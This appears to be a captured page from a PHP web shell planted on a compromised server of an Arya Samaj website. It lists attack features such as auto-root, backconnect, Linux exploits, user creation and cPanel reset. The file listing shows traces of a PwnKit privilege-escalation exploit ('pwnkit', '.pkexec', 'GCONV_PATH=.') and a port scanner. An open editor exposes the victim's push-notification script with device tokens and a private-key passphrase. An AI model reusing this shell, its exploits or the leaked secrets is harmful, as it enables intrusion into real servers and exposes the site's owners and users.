Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
apps /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
aryaSamajImages
[ DIR ]
drwxr-xr-x
bhajans
[ DIR ]
drwxr-xr-x
login
[ DIR ]
drwxr-xr-x
.ftpquota
11
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
aryasamajws.php
3.1
KB
-rw-r--r--
aryasamajwslike.php
1.67
KB
-rw-r--r--
error_log
4.39
MB
-rw-r--r--
mservices.php
512
B
-rw-r--r--
new_sendmessage.php
2.46
KB
-rw-r--r--
new_sendmessage2.php
2.29
KB
-rw-r--r--
portscan.php
272
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
sendmessage.php
2.89
KB
-rw-r--r--
sendmessage_aryasamaj.php
2.87
KB
-rw-r--r--
simplepush.php
1.52
KB
-rw-r--r--
storeregid1.php
729
B
-rw-r--r--
storetoken.php
870
B
-rw-r--r--
storetoken_aryasamaj.php
918
B
-rw-r--r--
tbl_info.php
511
B
-rw-r--r--
tbl_services.php
515
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : simplepush.php
<?php ini_set('display_errors',1); // Put your device token here (without spaces): //$deviceToken = '1d8febcd59b2d36562179dd05279180eeabed954'; //$deviceToken = '2b74cb51e858a9412fdd971cf04d89f18404ff9a12465c47fb6c2e80d0635125'; $deviceToken = '9ad60cdbdd6d71ad13f01ac3b51d94db4027fbb6279b4153f659e9a47f69dba1'; // Put your private key's passphrase here: $passphrase = '123456'; // Put your alert message here: $message = 'Namaste'; //////////////////////////////////////////////////////////////////////////////// $ctx = stream_context_create(); stream_context_set_option($ctx, 'ssl', 'local_cert', 'aryaFinal.pem'); stream_context_set_option($ctx, 'ssl', 'passphrase', $passphrase); // Open a connection to the APNS server $fp = stream_socket_client( 'ssl://gateway.sandbox.push.apple.com:2195', $err, $errstr, 60, STREAM_CLIENT_CONNECT|STREAM_CLIENT_PERSISTENT, $ctx); if (!$fp) exit("Failed to connect: $err $errstr" . PHP_EOL); echo 'Connected to APNS' . PHP_EOL; // Create the payload body $body['aps'] = array( 'alert' => $message, 'sound' => 'default' ); // Encode the payload as JSON $payload = json_encode($body); // Build the binary notification $msg = chr(0) . pack('n', 32) . pack('H*', $deviceToken) . pack('n', strlen($payload)) . $payload; // Send it to the server $result = fwrite($fp, $msg, strlen($msg)); if (!$result) echo 'Message not delivered' . PHP_EOL; else echo 'Message successfully delivered' . PHP_EOL; // Close the connection to the server fclose($fp);
Close